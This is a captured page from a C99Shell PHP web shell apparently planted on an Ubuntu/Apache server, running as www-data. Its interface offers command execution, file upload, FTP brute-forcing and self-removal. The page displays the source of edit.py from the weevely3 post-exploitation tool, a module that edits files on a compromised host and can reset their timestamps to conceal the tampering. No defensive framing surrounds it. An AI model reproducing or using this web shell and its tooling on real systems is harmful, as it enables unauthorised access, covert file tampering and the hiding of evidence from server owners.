!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/pmb/master/weevely3-master/src/weevely/modules/file/   drwxr-xr-x
Free 13.06 GB of 57.97 GB (22.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit.py (2.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
import hashlib
import re
import subprocess
import tempfile

from weevely.core import messages
from weevely.core.loggers import log
from weevely.core.module import Module
from weevely.core.vectors import ModuleExec


class Edit(Module):
    """Edit remote file on a local editor."""

    aliases = ["vi", "vim", "emacs", "nano", "pico", "gedit", "kwrite"]

    def init(self):
        self.register_info({"author": ["Emilio Pinna"], "license": "GPLv3"})

        self.register_arguments(
            [
                {"name": "rpath", "help": "Remote file path"},
                {"name": "-vector", "choices": ("file", "fread", "file_get_contents", "base64")},
                {"name": "-keep-ts", "action": "store_true", "default": False},
                {"name": "-editor", "help": "Choose editor", "default": "vim"},
            ]
        )

    def run(self, **kwargs):
        # Get a temporary file name
        suffix = re.sub(r"[\W]+", "_", self.args["rpath"])
        temp_file = tempfile.NamedTemporaryFile(suffix=suffix)
        lpath = temp_file.name

        # Keep track of the old timestamp if requested
        if self.args["keep_ts"]:
            timestamp = ModuleExec("file_check", [self.args.get("rpath"), "time"]).run()

        # If remote file already exists and readable
        if ModuleExec("file_check", [self.args.get("rpath"), "readable"]).run():
            # Download file
            result_download = ModuleExec("file_download", [self.args.get("rpath"), lpath]).run()

            # Exit with no result
            # The error should already been printed by file_download exec
            if result_download == None:
                return None

            # Store original md5
            md5_orig = hashlib.md5(open(lpath, "rb").read()).hexdigest()

            # Run editor
            subprocess.check_call([self.args["editor"], lpath])

            # With no changes, just return
            if md5_orig == hashlib.md5(open(lpath, "rb").read()).hexdigest():
                log.debug(messages.module_file_edit.unmodified_file)
                temp_file.close()
                return None

        else:
            subprocess.check_call([self.args["editor"], lpath])

        # Upload file
        result_upload = ModuleExec("file_upload", ["-force", lpath, self.args.get("rpath")]).run()

        # Reset original timestamp if requested
        if self.args["keep_ts"]:
            ModuleExec("file_touch", [self.args.get("rpath"), "-epoch-ts", str(timestamp)]).run()

        # Delete temp file
        temp_file.close()

        return result_upload

    def run_alias(self, line, cmd):
        # Run this alias independently from the shell_sh status.
        # Also, set the proper editor to run
        return self.run_cmdline("%s -editor %s" % (line, cmd))

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--